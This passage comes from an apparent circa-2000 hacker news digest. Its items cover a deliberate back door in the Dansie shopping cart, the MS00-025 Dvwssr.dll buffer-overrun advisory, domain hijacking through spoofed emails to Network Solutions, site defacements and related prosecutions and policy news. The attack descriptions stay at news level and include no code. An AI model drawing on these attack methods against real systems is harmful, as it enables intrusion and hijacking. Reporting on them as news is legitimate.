violations this level of access could result in; from stealing private
customer records to a full-blown crack of an E-Commerce server.
When checking to see if this was a known issue, the following post from
"Kasey Johns" <kasey at corridor dot net>, made a little over a week ago,
was discovered in alt.comp.perlcgi.freelance:
http://www.deja.com/getdoc.xp?AN=601644315
Follow-up article: http://www.deja.com/getdoc.xp?AN=601857849
We won't quote Kasey's posts here, in brief, Kasey also discovered the back
door and cloaked email routines. Kasey also provides evidence in the post to
indicate that not only is Dansie well aware of the back door routine, but
may be actively attempting to utilize it.
Based upon our own investigation, the information Kasey posted, and our own
firewall logs (see below), it is our opinion that the back door within
Dansie.net's shopping cart can best be summarized as follows:
1. The back door is very deliberate.
2. It isn't unique to the one copy we have access to here.
3. *Is being actively utilized by the author of the CGI.
* Based upon the log snippet in Kasey's post showing attempted access to
the CGI from an Earthlink dial-up IP. (209.179.141.0/24). According to
Kasey, access to the CGI was attempted less than 30 minutes after the cart
was installed.
When we noticed the attempted usage of Kasey's server, a quick check of our
own firewall logs revealed the following:
Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
{repeated several dozen times}
We can only assume these attempts, made from the same /24 on Earthlink's
dial-ups as the one used to probe Kasey's server, were from the author of
the shopping cart.
We will not try to hazard a guess as to why Dansie.net felt the need to
include a back door within their shopping cart software. Whatever their
reasoning may be, it is our opinion that no reason, no matter how well
thought out or rationalized, justifies the existence of this back door. No
reasoning can possibly explain away a routine that deliberately allows an
intruder unrestricted and unauthorized access to any server on the Internet
that has the Dansie Shopping Cart installed.
--
Joe Technical Support
General Support: support@blarg.net Blarg! Online Services, Inc.
Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net
@HWA
61.0 [HNN] MostHateD Pleads Guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by Cacopalyse
MosthateD (Patrick W. Gregory) a member of the online group Global
Hell (gH) has pleaded guilty to a single count of conspiracy to commit
telecommunications wire fraud in Texas US District Court. He could
receive up to five years in prison and a $250,000 fine. MostHateD was
among those snared during the wave of FBI raids immediately following
the defacement of the White House web page. Mindphaser (Chad Davis),
who was snagged during the same set of raids, pleaded guilty to
similar charges earlier this year in Green Bay Wisconsin.
NewsBytes
http://www.newsbytes.com/pubNews/00/147420.html
Pay to play pocket book ream site - sorry no story - Ed
@HWA
62.0 [HNN] NSA And CIA Deny Echelon is Used Domestically
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by root66
CIA Director George Tenet and NSA director Lt. Gen. Michael V. Hayden
staunchly denied allegations that either agency conducts electronic
surveillance on US citizens. The denials were in front of the US House
intelligence committee. After the hearing, Chairman Porter Goss,
R-Fla. said he was satisfied that "our safeguards are in place and are
working."
Associated Press - via San Jose Mercury News
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/037020.htm
Dead Url
@HWA
63.0 [HNN] Keyboard Monitoring Becoming More Popular with Business
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by root66
While keystroke monitoring software has been around for decades it has
recently become extremely popular in the corporate setting. With the
courts consistently siding with the employers on electronic monitoring
of employees and the low cost and availability of keystroke recording
software (This article says $99 but there are a lot of free ones.)
businesses are starting to snoop on their employees more and more.
San Jose Mercury News
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/085400.htm
Dead Url
@HWA
64.0 [HNN] Japanese Cult Wrote Software for Navy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by root66
HNN has reported on this before but another story has popped up
regarding the Japanese cult Aum Shinri Kyo (Supreme Truth), which was
involved with releasing nerve gas in a Japanese subway killing 12
people, and their involvement with developing software for the
Maritime Self Defense Force, or navy, including the whereabouts of
submarines. (Japan has submarines?)
Reuters - via The San Jose Mercury News
http://www.mercurycenter.com/breaking/docs/081626.htm
Dead Url
@HWA
65.0 [HNN] MPAA Suspects Denial of Service Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by Cruciphux
Yesterday HNN reported a rumor that the MPAA was under a denial of
service attack. Today MSNBC has received confirmation that
administrators of the site suspect that their current problems are
related to some sort of DoS attack. The attack is believed to be in
retaliation for the MPAA action regarding the DeCSS software.
MSNBC
http://www.msnbc.com/news/394566.asp?0m
Dead Url
@HWA
66.0 [HNN] Even More E-zines
~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by Slider_100
Oblivion Mag is the latest UK underground e-zine for hackers,
phreakers and vXers! issue #2 has just been released with the first
published interview with Curador. Also L33tdawg from Hack In The Box
has announced the availability of Issue #4.
Oblivion Mag
Hack In the Box
http://www.oblivion-mag.org.uk
http://www.hackinthebox.org
@HWA
67.0 [HNN] BackDoor Now Called a Bug
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by danders
dvwssr.dll, part of Microsoft server software with Front Page
extensions was revealed last Friday to have a backdoor password within
it that could allow malicious users access to the server. After
originally acknowledging the problem last Friday Microsoft is now
claiming that it is nothing more than bug. (Regardless of whether this
is a backdoor or a bug the fact that such items are present in release
versions of the code forces the user to question the completeness of
Microsofts quality assurance.)
MSNBC
Microsoft
NT Bug Traq
http://www.msnbc.com/news/394810.asp
http://www.microsoft.com/technet/security/bulletin/ms00-025.asp
http://www.ntbugtraq.com/default.asp?pid
Microsoft Security Bulletin (MS00-025) Procedure Available to Eliminate
"Link View Server-Side Component" Vulnerability
Originally Posted: April 14, 2000
Updated: April 17, 2000
Summary On April 14, 2000, Microsoft issued the original version of this
bulletin, to discuss a security vulnerability affecting several web server
products. Shortly after publishing the bulletin, we learned of a new,
separate vulnerability that increased the threat to users of these
products. We updated the bulletin later on April 14, 2000, to advise
customers of the new vulnerability, and noted that we would provide
additional details when known. On April 17, 2000, we updated the bulletin
again to provide those details.
A procedure is available to eliminate a security vulnerability that could
allow a malicious user to cause a web server to crash, or potentially run
arbitrary code on the server, if certain permissions have been changed
from their default settings to inappropriate ones. Although this bulletin
has been updated several times as the investigation of this issue has
progressed, the remediation steps have always remained the same �
customers running affected web servers should delete the affected file,
Dvwssr.dll. Customers who have done this at any point in the past do not
need to take any further action.
Frequently asked questions regarding this vulnerability and the procedure
can be found at
http://www.microsoft.com/technet/security/bulletin/fq00-025.asp
Issue Dvwssr.dll is a server-side component used to support the Link View
feature in Visual Interdev 1.0. However, it contains an unchecked buffer.
If overrun with random data, it could be used to cause an affected server
to crash, or could allow arbitrary code to run on the server in a System
context.
By default, the affected component, Dvwssr.dll, resides in a folder whose
permissions only allow web authors to execute it. Under these conditions,
only a person with web author privileges could exploit the vulnerability �
but a web author already has the ability to upload and execute code of his
choice, so this case represents little additional threat. However, if the
permissions on the folder were set inappropriately, or the .dll were
copied to a folder with lower permissions, it could be possible for other
users to execute the component and exploit the vulnerability.
Affected Software Versions The affected component is part of Visual
Interdev 1.0. However, it is a server-side component, and is included in
the following products
Microsoft� Windows NT� 4.0 Option Pack, which is the primary distribution
mechanism for Internet Information Server 4.0 Personal Web Server
4.0, which ships as part of Windows� 95 and 98 Front Page 98 Server
Extensions, which ships as part of Front Page 98. NOTE: Windows 2000 is
not affected by this vulnerability. Upgrading from an affected Windows NT
4.0 to Windows 2000 removes the vulnerability Installing Office 2000
Server Extensions on an affected server removes this vulnerability.
Installing FrontPage 2000 Server Extensions on an affected server removes
this vulnerability.
Remediation To eliminate this vulnerability, customers who are
hosting web sites using any of the affected products should delete all
copies of the file Dvwssr.dll from their servers. The FAQ provides
step-by-step instructions for doing this. The only functionality lost by
deleting the file is the ability to generate link views of .asp pages
using Visual Interdev 1.0.
More Information Please see the following references for more information
related to this issue.
Frequently Asked Questions: Microsoft Security Bulletin MS00-025
Microsoft Knowledge Base article Q259799 discusses this issue and will be
available soon. Microsoft TechNet Security web site
Obtaining Support on this Issue Information on contacting Microsoft
Technical Support is available at
http://support.microsoft.com/support/contact/default.asp.
Revisions
April 14, 2000: Bulletin Created. April 14, 2000: Bulletin updated
to provide preliminary results of investigation of buffer overrun
vulnerability April 17, 2000: Bulletin updated to provide final results of
investigation. THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS
PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL
WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL
MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES
WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF
BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS
SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME
STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR
CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT
APPLY.
Last updated April 17, 2000 � 2000 Microsoft Corporation. All rights
reserved. Terms of use.
@HWA
68.0 [HNN] North Carolina Plagued by 'hackers'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by Evilution
The FBI has warned that North Carolina is infested with '6hackers'9
and that business leaders should be concerned. Doris Gardner from the
Charlotte office of the FBI said that several machines within North
Carolina had been used in the recent massive DDoS attacks and that
such attacks had been launched against North Carolina business. She
refused to give further details citing the ongoing investigation but
promised a wave of prosecutions soon. (Just what we need, the FBI
running around claiming the sky is falling.)
The Charlotte Observer
ABC News
http://www.charlotte.com/observer/natwor/docs/cyberterror0414.htm
http://abcnews.go.com/sections/tech/DailyNews/nchack000414.html
State Target
North Carolina Businesses Target of Net Hackers
The Associated Press
C H A P E L H I L L, N.C., April 14 � The FBI is investigating computer
hacking in North Carolina. FBI agents warn that Internet hackers have
targeted several North Carolina businesses in recent months. They say
several computer systems in the state have been used by hackers to attack
businesses. Investigators spoke Thursday at the annual forum of the North
Carolina Electronics and Information Technologies Association. They urged
private businesses to cooperate in stopping hackers who are wreaking
millions of dollars in damage. This summer, the FBI plans to form a task
force with businesses to share information and alerts about hacking
attempts. The FBI will also survey North Carolina businesses to see how
many have been the victims of cyber-attacks.
@HWA
69.0 [HNN] Web Sites Redirected, Serbians Blamed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by Alex
The Network Solutions registration database has been compromised again
this time by people concerned over the crisis in Kosovo. Adidas,
Pfizer, Metro Goldwyn Mayer and LucasArts Entertainments and many
others all had their DNS rerouted to point to a page that said 'Kosovo
Is Serbia'
BBC
ABC News
Wired
WebDNS
http://news.bbc.co.uk/hi/english/world/europe/newsid_712000/712211.stm
http://www.abcnews.go.com/sections/world/DailyNews/hackers000414.html
http://www.wired.com/news/politics/0,1283,35674,00.html
http://www.webdns.com/news/item1.html
Friday, 14 April, 2000, 01:24 GMT 02:24 UK 'Serb hackers' on the rampage
More than 50 websites have been taken over by what is suspected to be a
group of Serb hackers.
The websites - which included such high-profile names as Manchester United
and Adidas - were stripped of their content, and branded with the image of
a double-headed eagle, with the words "Kosovo is Serbia".
A screen grab from eunet.com's hacked site
Many of the sites were Yugoslav, Bosnian and Croatian. The Kosovo Albanian
newspaper Koha Ditore and the Albanian site Kosovapress were also among
those hacked.
In another development, the website of the Serbian Ministry of Information
reported that it and other Yugoslav sites had been taken over.
It said "American-Albanian propagandists" had forged the entire English
version of its site on Wednesday.
"In a planned and malicious action, regularly registered Yugoslav sites
were taken over on the central server of an American firm involved in the
registration of the internet domains," it added.
"Numerous sites of the Yugoslav providers, political parties and firms
were attacked in a synchronised manner," it said.
Chance discovery
Most of the companies in the "Kosovo is Serbia" attack have since
reclaimed their websites.
Manchester United believes the culprits were "cyber-squatters", who
register internet sites in the names of celebrities or well-known
companies, and then try to sell them back again.
An internet company which monitors domain names, WebDNS, spotted that the
hacking was part of a sustained campaign.
Alex Jeffreys, the technical director of WebDNS, said he noticed that
several high-profile web-sites were being hacked on Monday.
"I almost stumbled over it by chance, when I noticed that a number of
large company domain names had changed ownership," he told News Online.
As he began checking details of some of the thousands of websites being
supported by the server Webprovider Inc, he discovered more than 50 sites
that had been hacked from the same address.
Hacked websites
viagra.com
eunet.com
winston.com
jamesbond.com
indianajones.com
mafia.com
kosova.com
yu.com
slovenia.com
bosnia.com
sarajevo.com
warcrimesmonitor.com
arkan.com
tudjman.com
The hacked websites had all been registered with Network Solutions, the
world's largest register.
Mr Jeffreys said it appeared that the hackers had changed the contact
details in Network Solutions' database on Sunday night.
The contact addresses were at first transferred to a Yugoslav address, and
then on Monday night to an Albanian address.
"It seems that the Network Solutions database is quite open for hacking,
rather than it being one company in particular," he said.
How the hackers worked
It is impossible to say exactly who the hackers are, or how they managed
to breach databases that should be secure.
However, Mr Jeffreys said they probably sent spoof e-mails to Network
Solutions, pretending to be from the company concerned, and requesting a
change of address.
The requests for a modification are sent by an automatic e-mail form.
Although Network Solutions was not available for comment, a message on
their answer machine said that "if you are making a registrar name change
or contact modifications request" there would be delays while they
"carefully review your request for change".
ABC NEWS;
Hack Attack
Security Glitch Turns Major Web Sites Into Kosovo Billboards
Hackers got into more than 50 Web sites in what appeared to be a
coordinated effort to promote Serbs in Kosovo. This is what slovenia.com
looked like after the cyber attack. (slovenia.com)
By Andrew Chang
April 14 � This week, the tensions in Kosovo reached around the world, into
innumerable desktops � thanks to a group of hackers. Hackers got into more
than 50 Web sites � including those of some high-profile names, like
addidas.com, mgm.com and viagra.com � in what appeared to be a coordinated
effort to promote Serbs in Kosovo. The sites were stripped of their
content, and branded with an image of a two-headed eagle with the words,
�Kosovo is Serbia.� The two-headed eagle is a common image in southeastern
Europe. It is used by Bosnian Serbs, as well as Albanians, the former
Kosovo Liberation Army, and Russians. One London newspaper report said the
hackers had hit up to 2,000 Web sites. Among the other sites that were
hacked were indianajones.com and jamesbond.com. Many of the targets were
from the Balkans. The Kosovo Albanian newspaper Koha Ditore and the
Albanian site Kosovoapress were also among those hacked, the BBC reported.
Most of the companies have since reclaimed their Web sites.
An Odd Discovery
Alex Jeffreys, technical director for WebDNS, a London-based Web security
and registration firm, says he first noticed the hacking on Monday, when he
noticed a large number of domains had changed ownership. Jeffreys told
ABCNEWS.com he was scanning a public directory of domain names when he
noticed many of them had moved the domain name contacts away from their
rightful owners to a Hotmail e-mail address. It is unusual for established
companies to move their contact e-mail address to a free e-mail service
like Hotmail, Jeffreys said. Signing up for Hotmail is almost anonymous �
and brand-name companies usually have e-mail addresses based off their own
sites.
Network Solutions to Blame?
All the hacked Web sites had been registered with Network Solutions, the
world�s largest register. The hackers manged to breach security by
sending spoof e-mails to Network Solutions, pretending to be from the
company concerned and requesting a change of address, said a spokesperson
for Network Solutions, who declined to be identified. The spokesperson said
the chosen Web sites were hacked because they used the most basic level of
online security � an automated process where the e-mail address of a user
requesting a change of address is only checked against the e-mail address
on record of the person authorized to make such a change, By forging their
e-mail addresses, the hackers fooled the automation into thinking they were
authorized to make a change � and subsequently moved authority for the site
to a Hotmail account. The company does offer its users higher levels of
security, the Networks Solutions spokesperson said. Most of the prominent
sites were back to normal today, and made no mention of the hacking. A few,
like slovenia.com, still displayed the �Kosovo is Serbia� brand. Others,
like eunet.com and yu.com, appeared to have been shut down altogether.
Jeffreys hoped the Web sites had learned a valuable lesson about security.
�It shouldn�t be that simple to make the change,� he said.
@HWA
70.0 [HNN] Metallica Sues Napster, Gets Web Site Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Metallica shows us that they are now as hip as our dads and acting
like stuck up suits to prove it, Metallica: you're washed up, too
old, your music is limp, and you're old and decrepit. Fuck y'all
- Ed.
April 17th
contributed by Evil Wench
Metallica, one of the few groups that owns its own music, has filed
suit against Napster and several colleges for copyright infringement.
In retaliation Metallica's web site was defaced in protest. This is
the second time within the last eight months that the Metallica site
has been defaced.
ZD Net
Attrition Mirror #1
Attrition Mirror #2
http://www.zdnet.com/zdnn/stories/news/0,4586,2543398,00.html
http://www.attrition.org/mirror/attrition/1999/08/20/www.metallica.com
/toprightpart.html
http://www.attrition.org/mirror/attrition/2000/04/14/www.metallica.com
/
ZDNet
Metallica's Napster hit: 'Enter Lawman'
Rock group sues Napster and several colleges, alleging copyright violation
by allowing the illegal swapping of its storied music. Cybervandals
retaliate.
By Lisa Bowman, ZDNet News UPDATED April 14, 2000 12:32 PM PT
The rock group Metallica has sued Napster Inc. and several colleges,
claiming, among other things, that they violated copyright law by allowing
illegal swapping of its music. E/M Ventures and Creeping Death Music are
also plaintiffs in the suit, which was filed in U.S. District Court in the
Central District of California and targets the University of Southern
California, Yale University and Indiana University. In apparent
retaliation Friday, Metallica's Web site was targeted by cybervandals. The
unknown hackers left a simple message: "LEAVE NAPSTER ALONE." Aside from
two links -- one to Napster and another to the main page of the official
Metallica site -- no other message, on the page or in the source code, was
posted.
This is the first time a music group has gone after Napster, the
controversial software that allows people to locate and copy MP3 files.
Dozens of colleges have banned its use, claiming it hogged bandwidth and
fearing they would be slapped with lawsuits similar to this one. However,
in February, USC bucked that trend, saying that it would continue to allow
its students to use the technology, which is downloadable from the
Internet.
San Mateo, Calif.-based Napster already is the target of a suit by the
Recording Industry Association of America, which claims that Napster
violates the Digital Millennium Copyright Act, a new law that bars devices
that could be used to circumvent copyrights.
The suit says students who use Napster 'exhibit the moral fiber of common
looters.'
Having Metallica as a plaintiff in this latest case gives the industry
even more brand-name backing.
The recording industry is worried that digital music files will weaken
their power over the sale and distribution of songs, and Napster is one of
several new technologies that make it easier for people to swap digital
music files.
'Morally and legally wrong' In a press release announcing the suit,
publicists for the band and music companies even threw in a statement from
Metallica drummer Lars Ulrich, who said it is "sickening to know that our
art is being traded like a commodity rather than the art that it is."
"From a business standpoint, this is about piracy -- aka taking something
that doesn't belong to you -- and that is morally and legally wrong."
In the suit, Metallica and the music companies claim that Napster not only
violated their copyrights, but also encouraged unlawful use of digital
audio devices and enabled the violation of the Racketeering Influenced &
Corrupt Organizations Act, or RICO.
The suit says that students who use Napster to copy files "exhibit the
moral fiber of common looters."
Napster officials weren't immediately available for comment.
@HWA
71.0 [HNN] Japan To Control PS Exports, Fears Weapon Use
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by Evil Wench
Japanese officials have placed severe export restrictions on the new
PlayStation2 that prevents Sony from shipping units to the US and
other countries. Officials fear that the technology could be used as a
weapon. An example given was to use the PS2 image processing
capabilities to help control a Tomahawk missile.
Reuters - via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2550857,00.html
@HWA
72.0 [HNN] Spy Laptop Goes Missing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by William Knowles
A laptop filled with highly secret information was reported missing
from a supposedly secure conference room at the State Department's
Bureau of Intelligence over a week ago. Officials are unsure at this
point if the laptop was stolen or is merely misplaced. (Misplaced?)
Associated Press
Washington Post
http://ap.tbo.com/ap/breaking/MGIVIOBR57C.html
defunct url
http://www.washingtonpost.com/wp-dyn/articles/A26517-2000Apr16.html
Post;
State Dept. Computer With Secrets Vanishes
By Steven Mufson Washington Post Staff Writer Monday, April 17, 2000; Page
A02
A laptop computer containing top-secret information vanished from the
State Department's Bureau of Intelligence and Research more than a week
ago, and the FBI is investigating whether it was stolen, a senior State
Department official said.
The laptop's disappearance from a supposedly secure conference room at the
department has set off an intense effort to recover the computer and a
search for suspects, including contractors who have been renovating the
area, the official said.
Another person familiar with the incident said that the missing computer
contains "code word" information, a classification higher than top secret,
and that it includes sensitive intelligence information and plans.
The incident is the latest of a string of embarrassing security breaches
at the State Department. Last year, counterintelligence officials from the
FBI discovered a Russian spy lurking outside the department and later an
eavesdropping device planted in a conference room. In 1998, a man dressed
in a tweed coat strolled into the executive secretary's office, six doors
down from the office of Secretary of State Madeleine K. Albright, helped
himself to a sheaf of classified briefing materials in plain view of two
secretaries, and walked out. The man was never identified and the
materials were never recovered.
A senior State Department official said that it remained unclear whether
the laptop was misplaced or stolen and that, if it was stolen, whether the
thief realized the sensitivity of the material it contained or took it
simply for the value of the hardware.
The senior State Department official added that the laptop's disappearance
was not the result of poor security procedures, but rather the failure of
State employees to follow those procedures. He said it appeared that some
contractors had not been properly escorted when working in the building.
"Some policies and procedures were not followed," said the senior
official. "It is my very sincere hope that the responsible individual or
individuals will be punished."
Another person familiar with the incident said that an official had
propped open the door of a secure conference room, that contractors
lacking security clearances were working in the sensitive area and that
the laptop had not been properly secured.
The material the laptop contains is classified as "sensitive compartmented
information" (SCI), the government's most sensitive intelligence reports.
The Bureau of Intelligence and Research (INR) is responsible for handling
all top-secret reports at State; information with lower levels of
classification is handled by the Office of Diplomatic Security.
Last year, INR came under fire from the department's inspector general for
lax handling of that material. "The department is substantially not in
compliance with the director of central intelligence's directives that
govern the handling of SCI," the inspector general, Jacqueline
Williams-Bridger, concluded in the report.
The CIA also "questioned INR's dedication" to the proper handling of the
top-secret material, the State Department official said. The CIA and other
agencies believe that the State Department in general fails to attach
adequate importance to safeguarding secrets.
The inspector general recommended transferring responsibility for SCI to
State's Office of Diplomatic Security. But a just-completed internal
review recommended leaving responsibility for SCI with INR and adding 19
new people to help the bureau better handle the material, the department
official said.
The inspector general's report and the Russian bugging incident prompted
criticism from Congress, which sequestered some funding earmarked for INR
and demanded a review of how top-secret information is handled at the
department. At a Feb. 7 presentation of State's budget, Albright said she
was "continuing to study the possible need for structural changes to
ensure that the mandate for the best security is everywhere understood and
everywhere applied."
The State Department laptop incident follows two intelligence episodes
involving stolen laptops in England. A laptop containing sensitive
information was stolen from a British army officer at Heathrow Airport.
Separately, a laptop containing secret information about Northern Ireland
was stolen from an MI5 agent at the Paddington Station of the London
Underground. In a third incident, an MI6 officer left his laptop computer
containing training information about how to be a spy in a taxi after a
night spent drinking at a bar near the agency's London headquarters.
MI6 is the British agency responsible for foreign intelligence and foreign
spies; MI5 handles internal security matters.
The MI6 officer's laptop was recovered after the agency placed a
classified ad in a newspaper offering a reward for its return. The MI5
officer's computer has not been found.
� 2000 The Washington Post Company
@HWA
73.0 [HNN] Napster Users May Get Jail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by knobdicker
New sentencing guidelines due to take effect in May could land Napster
users in jail. Users of Gnutella, Napigator, Wrapster and other
programs could also be effected. The new sentencing guidelines cover
intellectual property offenses on an emergency interim basis, and stem
from the 1997 No Electronic Theft Act.
CNN
http://www.cnn.com/2000/TECH/computing/04/14/MP3.crackdown.idg/index.html
Swap MP3s, go to jail? From...
April 14, 2000 Web posted at: 10:35 a.m. EDT (1435 GMT)
by Tom Spring
(IDG) -- Pirates. That's all the infuriated music industry sees in
Napster, the first online application that lets you download basically any
MP3 music without spending a dime. In fact, the Recording Industry
Association of America has pushed Napster out on the plank: A San
Francisco judge soon will rule on its lawsuit alleging Napster runs a
giant haven for music piracy.
But the Napster case may be only the opening sword fight. The recording
industry is taking very seriously what it considers Internet plundering of
its jewels. And new sentencing guidelines scheduled to take effect in May
could actually land MP3 pirates in the brig. That is, while simple
hobbyist downloads are tough to track, Netizens who violate copyright law
by aggressively sharing software and digital tunes face arrest and even
jail.
Napster is not the only target. Since that suit was filed in December, a
fleet of similar applications has sailed onto the Net. Web-based
applications such as Gnutella, Napigator, and Wrapster are making it just
about impossible to protect music, software programs, photographs, videos,
or almost any other copyrighted digital material. The sites promote the
programs for legal MP3 trading and often post a policy statement to that
effect. In reality, the sites do not police their users (and sometimes
note that, as well).
The cops know they can't stop everybody, but they aim to get everyone's
attention.
"There is no way we can arrest a million people," acknowledges Glenn Nick,
assistant director of the U.S. Customs Agency's CyberSmuggling Center. The
distribution programs have flooded out far too widely for law enforcement
to stop all cases of illegal copying. Unlike Napster, many programs in
this new breed operate peer-to-peer, so there's no central site for
investigators to target.
The cuffs aren't digital
page Scour.net to debut 'Son of Napster' MP3.com sues the recording
industry Create your own MP3 radio station Casio brings MP3 player to
the wrist Reviews & in-depth info at IDG.net E-Business World Year 2000
World Questions about computers? Let IDG.net's editors help you
Subscribe to IDG.net's free daily newsletter for computer geniuses (&
newbies) Search IDG.net in 12 languages
But brace yourself for some serious arrests.
"People say you can't do anything about speeding," says Randy Thysse,
supervisory special agent at FBI headquarters in Washington, D.C. "But
[you can] park a cruiser on the side of the road to slow people down."
So watch for that virtual patrol car, and expect more than a ticket.
Thysse advocates jail time for software and music buccaneers -- and
starting next month, judges may go along with him.
Convicted copyright offenders can receive jail time under new sentencing
guidelines that take effect May 1. The policies cover intellectual
property offenses on an emergency interim basis, and stem from the 1997 No
Electronic Theft Act.
"It's getting increasingly easy to swap software and increasingly hard to
catch pirates," says John Wolfe, manager of investigations for the
Business Software Association. "These new sentencing guidelines give law
enforcement some real ammunition."
I fought the law and the law... won? While the Justice Department
has shown a great resolve to stop computer piracy, until now criminal
penalties have been limited. They are too small to justify the big price
tags of investigation and prosecution, says the FBI's Thysse.
The BSA and others are betting that high-profile busts will send a clear
message to intellectual property crooks. "The odds are you aren't going to
get caught," says Wolfe, but you'll never know.
You're taking a two-pronged risk when you use these file-swapping tools,
points out Nick of the Customs Department.
As part of the process, you open your PC to the public so you can download
files. This exposes your PC to hackers and viruses.
It also exposes you legally. You're a private Netizen when you're simply
surfing, but when you open a subdirectory of your PC, you've changed your
online status and have become a de facto server, subject to law
enforcement investigations. And if they bust you, they can take your
equipment.
Clearly, law enforcement is doing more than sabre-rattling. But as an
aside, Nick comments that it's also time the music industry developed
better digital safeguards instead of relying on electronic cops.
Peeking into the secret-sharers What does this controversy look like
from the other side?
I took a look at Gnutella, one of dozens of these new-breed file-swapping
programs popping up all over the Net. It connects you to a peer-to-peer
distributed network -- basically, a 24-hour impromptu digital swap meet
online.
Like similar programs, it is clumsy but powerful. Once Gnutella is
installed, you must designate a directory on your computer to make
"public" and one to receive downloaded files. Connect to the Internet, and
the program automatically links you to thousands of people running
Gnutella on their PCs.
Once connected, your "public" directory and anything in it become part of
a gargantuan keyword-searchable database. You can request MP3s, games,
software applications, and music videos. Your request moves quickly from
computer to computer, returning links to files. Simply click on the files
you want, and programs begin to download. Napster, it should be noted, is
aimed at music files, while Gnutella has a broader reach.
No, PC World does not condone illegal copying of files, and neither does
the quasi-official Gnutella site. "There is nothing inherently illegal
about sharing files," points out Ian Hall-Beyer, host of the site.
But it's clearly a popular pastime. With the Gnutella "monitor" function
selected, you can watch in astonishment, as I did, as anonymous users
scanned my public directory looking for everything from Windows 2000 and
Photoshop to X-rated images and Britney Spears MP3s. (Outta luck, guys!)
And at any given moment, hundreds of people are running Gnutella,
Napigator, Wrapster, Napster, and similar programs that are still
surfacing. They're busily downloading files -- some of them perfectly
legally -- but now the feds have them in their spyglass.
@HWA
74.0 [HNN] Brazil Tax Records on the Loose
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by EviL Wench
The Sao Paulo Crime Laboratory has confirmed that the tax records of
11.5 million Brazilian taxpayers has been leaked to a direct mail
marketing form. Officials have not released how the information was
compromised. The data reportedly was from 1998 tax returns and
included the names, incomes, addresses, telephone numbers, activities
and other information of 7.6 million individuals and 3.9 million
companies.
Nando Times
http://www.nandotimes.com/technology/story/0,1643,500193192-500262160-501356912-0,00.html
Dead Url
@HWA
75.0 [HNN] SingNet Suffers Abuse From Overseas
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by Evil Wench
The Singapore ISP SingNet is facing increasing problems from fraud
from overseas users. SingNet provides a service known as Global
Roaming which allows users to connect to a local ISP to use its
services to prevent long distance phone changes. SingNet says that
about fifty users a month are target as fraudulent.
Straits Times
http://www.straitstimes.asia1.com/singapore/sin20_0407.html
Dead Url
@HWA
76.0 [HNN] Attrition Graphs
~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by munge
Attrition.org has collected some rather interesting data regarding web
page defacements that shows some clear trends in the defacements by
the OS.
Attrition.org
http://www.attrition.org/news/content/00-04-16.001.html
@HWA
77.0 [HNN] Wide Open Source
~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by Brian
Is Open Source really more secure than closed? Elias Levy says there's
a little security in obscurity. "Most open source users run the
software, but don'9t personally read the code. They just assume that
someone else will do the auditing for them, and too often, it'9s the
bad guys."
Security Focus
http://www.securityfocus.com/commentary/19
Wide Open Source Is Open Source really more secure than closed? Elias Levy
says there's a little security in obscurity. By Elias Levy April 16, 2000
11:59 PM PT
One of the great rallying cries from the Open Source community is the
assertion that Open Source Software (OSS) is, by its very nature, less
likely to contain security vulnerabilities, including back doors, than
closed source software. The reality is far more complex and nuanced.
Advocates derive their dogmatic faith in the implicit security of Open
Source code from the concept of "peer review," a cornerstone of the
scientific process in which published papers and theories are scrutinized
by experts other than the authors. The more peers that review the work,
the less likely it is that it will contains errors, and the more likely it
is to become accepted.
Open Source apostles believe that releasing the source code for a piece of
software subjects it to the same kind of peer review as a quantum physics
theory published in a scientific journal. Other programmers, the theory
goes, will review the code for security vulnerabilities, reveal and fix
them, and thus the number of new vulnerabilities introduced and discovered
in the software will decrease over time when compared to similar closed
source software.
It's a nice theory, and in the ideal Open Source world, it would even be
true. But in the real world, there are a variety of factors that effect
how secure Open Source Software really is.
Sure, the source code is available. But is anyone reading it?
If Open Source were the panacea some think it is, then every security hole
described, fixed and announced to the public would come from people
analyzing the source code for security vulnerabilities, such as the folks
